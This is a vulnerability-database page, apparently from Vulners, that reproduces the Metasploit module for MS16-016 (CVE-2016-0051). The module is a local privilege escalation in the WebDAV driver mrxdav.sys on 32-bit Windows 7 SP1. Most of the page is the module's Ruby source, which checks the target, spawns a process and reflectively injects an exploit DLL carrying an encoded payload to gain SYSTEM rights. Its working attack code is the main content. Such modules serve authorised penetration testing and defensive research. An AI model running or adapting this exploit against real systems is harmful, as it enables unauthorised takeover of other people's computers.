Lucene search
K

MS16-016 mrxdav.sys WebDav Local Privilege Escalation

🗓️ 06 Jul 2016 01:50:43Reported by Tamas Koczka, William Webb <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 75 Views

MS16-016 mrxdav.sys WebDav Local Privilege Escalatio

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation',
      'Description'    => %q{
        This module exploits the vulnerability in mrxdav.sys described by MS16-016.  The module will spawn
        a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing
        the specified payload within the context of the elevated process.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tamas Koczka',                               # Original Exploit
          'William Webb <william_webb[at]rapid7.com>'   # C port and Metasploit module
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'DisablePayloadHandler' => false
        },
      'Targets'        =>
        [
          [ 'Windows 7 SP1', { } ]
        ],
      'Payload'        =>
        {
          'Space'       => 4096,
          'DisableNops' => true
        },
      'References'     =>
        [
          [ 'CVE', '2016-0051' ],
          [ 'MSB', 'MS16-016'  ]
        ],
      'DisclosureDate' => '2016-02-09',
      'DefaultTarget'  => 0
    }))
  end

  def check
    if sysinfo["Architecture"] == ARCH_X64
      return Exploit::CheckCode::Safe
    end

    Exploit::CheckCode::Detected
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if sysinfo["Architecture"] == ARCH_X64
      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
    end

    print_status('Launching a process to host the payload DLL, then reflectively injecting the DLL and running it...')
    encoded_payload = payload.encoded
    execute_dll(
      ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll"),
      encoded_payload
    )
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
    sleep(3)
  end
 end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jul 2021 17:34Current
0.7Low risk
Vulners AI Score0.7
CVSS 27.2
CVSS 37.8
EPSS0.23383
75